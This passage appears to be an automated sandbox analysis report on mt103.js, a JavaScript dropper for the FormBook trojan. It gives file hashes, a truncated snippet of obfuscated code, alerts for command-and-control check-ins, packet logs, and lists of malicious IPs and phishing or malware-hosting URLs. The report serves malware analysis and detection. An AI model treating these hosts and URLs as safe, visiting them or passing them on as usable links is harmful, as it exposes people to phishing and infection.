          | 13:40:00 | API Interceptor | 1309x Sleep call for process: explorer.exe modified |
                                                    438bTWucNC.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    2B4FbdDSQ0.exeGet hashmaliciousBrowse
                                                    • 162.241.2.233
                                                    setup.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    BANK SLIP.exeGet hashmaliciousBrowse
                                                    • 162.241.3.29
                                                    Z43tniEVyF.exeGet hashmaliciousBrowse
                                                    • 162.241.2.197
                                                    DHL Original BL, PL, CI Copies.htm.exeGet hashmaliciousBrowse
                                                    • 162.241.203.45
                                                    VirtualBox-7.0.2-154219-Win.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    VirtualBox-7.0.2-154219-Win.exeGet hashmaliciousBrowse
                                                    • 162.241.203.136
                                                    Updated_Service_Policy.exeGet hashmaliciousBrowse
                                                    • 162.241.203.45
                                                    Telex_Copy.exeGet hashmaliciousBrowse
                                                    • 162.241.2.192
                                                    http://www.nntyholdings.co.zaGet hashmaliciousBrowse
                                                    • 192.185.147.102
                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19https://1drv.ms/w/s!Ak7psWnXktOUbpS5SvTskZcJZMEGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://qha4c.app.link/xtg1RqDrPwbGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://1drv.ms/w/s!Au8rnhmq1l5ZfHjnhpQ700s_UP0Get hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://explore-foliosociety.com/4EQH-1H9GJ-7WM5TM-1AWIZQ-1/c.aspxGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Fct63d79.msiGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Requested PO ___ .htmGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    SC_TR11670000.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    scan_2023748984785874774.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    BookingDetails77#6276.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    cargo_manifest_3432-67383-733.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    #Ud83d#Udd0aAudio-Mesage Transcription.HtML.htmLGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://www.google.com/url?q=https://script.google.com/macros/s/AKfycbzM_yOymOPYchWgWLzEuacoAGupl5BjLFzJz3f2tw-iRoxvi2cxifVfC3q4axRhdPM3/exec?q5erdwyd&sa=D&source=docs&ust=1674899009939775&usg=AOvVaw0g89hrD8M7bB_E-BkBqs_ZGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    RlqmqtGmmo.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    rzIzm68n2l.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    sdkfgnasfnjdg.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://arbikinis.com.mx/wp-includes/images/redi.phpGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    file.exeGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    Voice Call Transmitter.htmlGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    https://karl-jaspers-gesellschaft.de/Get hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    4567876tyu.htmlGet hashmaliciousBrowse
                                                    • 91.227.138.48
                                                    No context
                                                    Process:C:\Users\user\AppData\Local\Temp\HBhG.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):226
                                                    Entropy (8bit):5.3467126928258955
                                                    Encrypted:false
                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                    MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                    SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                    SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                    SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):615936
                                                    Entropy (8bit):7.947521655611989
                                                    Encrypted:false
                                                    SSDEEP:12288:OCF4GQWsWKKlWr2LD1WpN8Vm62Mum/sxMjp2ilM:Oi4GQWs0LpW0m62IsaJW
                                                    MD5:02DF8C86345D056735FA60116B93ED2B
                                                    SHA1:70294E9E09C8D9D895599B73D1091C4013AEE691
                                                    SHA-256:C7627ADC0797D3315C2C942356C8CB1FCA39AFBD0335512236BE79A6E2F7ACB3
                                                    SHA-512:02A16FFDA407D61663E2CBC8FE2D4699528AA439E5899B773484C197A823D414DA197B0A6E4AA18FF962E12E7268BDD358399D58502700E262CBB7201EE549A6
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 55%
                                                    Process:C:\Windows\SysWOW64\control.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):94208
                                                    Entropy (8bit):1.2891393435168748
                                                    Encrypted:false
                                                    SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                                    MD5:037D23498B81732EEAAAD0E8015F3F85
                                                    SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                                    SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                                    SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                                    Malicious:false
                                                    File type:ASCII text, with very long lines (9408), with no line terminators
                                                    Entropy (8bit):5.501067259387244
                                                    TrID:
                                                    • Java Script (8504/1) 100.00%
                                                    File name:mt103.js
                                                    File size:9408
                                                    MD5:aef9d0a0d6eb0f1acc61c9fef31df227
                                                    SHA1:8ab951947dfa34a70ed7aeea10b7662b481049f0
                                                    SHA256:4bfa87d48d207b7b0a04112356e6bebe73ebc8f817bb0f940ef0b1aa5f2a2c4d
                                                    SHA512:38b11a55705c746aa35b53e2bd53529d5f36c5b02516249cbb35c36be08cd8d066f784348fb7843cf2355b3316db088afd6b9037a15a430994a8f8df09f0f86d
                                                    SSDEEP:192:R8eKzt6KEbkQUGeTvkCypW3MsgmW6kIGwKda0wtT3SLN5etUh/bMJ+wQKx4fyNa3:xKZnPKGvr30zo0WoXT9KyqakZl+q5q0Y
                                                    TLSH:84122F092AD065C803C70BB33B2BF5E6E9AD9ABF3955885F9101BC91BE10E25DAD5630
                                                    File Content Preview:var _0x296948=_0x4692,_0x25c5ce=_0x4251;(function(_0x1fd6ec,_0x1eb0be){var _0x496a96=_0x4692,_0x399b45=_0x4251,_0x2663fc=_0x1fd6ec();while(!![]){try{var _0x434d37=-parseInt(_0x399b45(0x19e))/0x1+-parseInt(_0x399b45(0x1af))/0x2+parseInt(_0x399b45(0x188))/0
                                                    Icon Hash:e8d69ece968a9ec4
                                                     Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                     01/30/23-13:40:47.278994 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.6 | 184.94.215.91
                                                     01/30/23-13:40:47.278994 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.6 | 184.94.215.91
                                                     01/30/23-13:40:47.278994 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49731 | 80 | 192.168.2.6 | 184.94.215.91
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jan 30, 2023 13:39:22.415781021 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415808916 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415827990 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.415853977 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415873051 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.415977955 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416058064 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416058064 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416074991 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416114092 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416222095 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416292906 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416373014 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416454077 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416469097 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416488886 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416518927 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416520119 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416551113 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416559935 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.416598082 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.416632891 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.420929909 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.421087027 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.446969986 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447057962 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447197914 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447223902 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447273970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447513103 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447621107 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447782040 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447875023 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.447895050 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.447993040 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.449795961 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449877977 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449944019 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.449966908 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.449990034 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.450017929 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451205015 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451385021 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451467037 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451592922 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451627970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451627970 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451647997 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451673031 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451710939 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.451745987 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.451814890 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452194929 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452303886 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452696085 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452773094 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452788115 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452796936 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452828884 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452856064 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452857018 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452876091 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.452958107 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.452965975 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453017950 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.453022957 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453058958 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.453119040 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:22.453167915 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.454703093 CET49714443192.168.2.691.227.138.48
                                                    Jan 30, 2023 13:39:22.454730988 CET4434971491.227.138.48192.168.2.6
                                                    Jan 30, 2023 13:39:57.546324968 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.582758904 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.586954117 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.586954117 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.623389959 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623446941 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623467922 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:39:57.623763084 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.624233961 CET4971980192.168.2.62.57.90.16
                                                    Jan 30, 2023 13:39:57.660485029 CET80497192.57.90.16192.168.2.6
                                                    Jan 30, 2023 13:40:19.792903900 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.001596928 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.001739979 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.001878023 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:20.210808992 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.210977077 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.211021900 CET8049721164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:20.211127996 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:21.513009071 CET4972180192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.527595997 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.737683058 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.737827063 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.738095045 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:22.946904898 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.946933031 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.946950912 CET8049722164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:22.947011948 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:24.245372057 CET4972280192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.262624025 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.484009027 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.484124899 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.484545946 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.706729889 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.706928015 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.706950903 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:25.707140923 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.707547903 CET4972480192.168.2.6164.88.201.214
                                                    Jan 30, 2023 13:40:25.928698063 CET8049724164.88.201.214192.168.2.6
                                                    Jan 30, 2023 13:40:30.764200926 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:30.967143059 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:30.970335007 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:30.970472097 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:31.172807932 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.172877073 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.172954082 CET804972518.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:31.173029900 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:32.480093002 CET4972580192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.496948957 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.695856094 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.696396112 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.696614027 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:33.895018101 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895057917 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895081043 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895095110 CET804972618.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:33.895309925 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:35.202296972 CET4972680192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.215483904 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.425582886 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.425718069 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.425826073 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.635426044 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635482073 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635502100 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:36.635760069 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.636168003 CET4972780192.168.2.618.138.206.213
                                                    Jan 30, 2023 13:40:36.845787048 CET804972718.138.206.213192.168.2.6
                                                    Jan 30, 2023 13:40:41.676239014 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:41.844973087 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:41.845174074 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:41.845371008 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.013531923 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128724098 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128768921 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128793955 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128820896 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128827095 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.128868103 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:42.128945112 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.128967047 CET8049728184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:42.129005909 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:43.402419090 CET4972880192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.404827118 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.577898026 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.578073978 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.578386068 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.749290943 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.749335051 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859843016 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859882116 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859901905 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859924078 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.859965086 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.860017061 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:44.862633944 CET8049729184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:44.862781048 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:46.090738058 CET4972980192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.106947899 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.278270006 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.278618097 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.278994083 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.450901985 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556508064 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556543112 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556564093 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556608915 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556624889 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556642056 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:47.556866884 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.556984901 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.557430983 CET4973180192.168.2.6184.94.215.91
                                                    Jan 30, 2023 13:40:47.728897095 CET8049731184.94.215.91192.168.2.6
                                                    Jan 30, 2023 13:40:52.700012922 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:52.992713928 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:52.992897987 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:52.993088961 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.286868095 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424937963 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424966097 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.424988031 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.425043106 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.432383060 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.432414055 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.432516098 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.435611963 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.435642958 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.435726881 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.446582079 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446629047 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446661949 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.446739912 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.446784973 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:53.716959000 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.717006922 CET8049732103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:53.717175961 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:54.503427982 CET4973280192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.529690027 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.823306084 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:55.823544025 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:55.823978901 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.114732027 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280698061 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280740976 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280770063 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.280824900 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.287031889 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.287069082 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.287189007 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.290450096 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.290494919 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.290525913 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.300537109 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300573111 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300595999 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.300652981 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.301518917 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:56.570230961 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.570288897 CET8049733103.221.223.104192.168.2.6
                                                    Jan 30, 2023 13:40:56.570405960 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:57.326096058 CET4973380192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.342499971 CET4973480192.168.2.6103.221.223.104
                                                    Jan 30, 2023 13:40:58.640877962 CET8049734103.221.223.104192.168.2.6
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                    Jan 30, 2023 13:40:52.582340956 CET5608653192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:40:52.698882103 CET53560868.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:04.136297941 CET5654753192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:04.160065889 CET53565478.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:14.567718029 CET5988153192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:14.589167118 CET53598818.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:24.856324911 CET5034353192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:25.514851093 CET53503438.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:36.453315020 CET6252053192.168.2.68.8.8.8
                                                    Jan 30, 2023 13:41:36.583319902 CET53625208.8.8.8192.168.2.6
                                                    Jan 30, 2023 13:41:48.187325954 CET5562953192.168.2.68.8.8.8
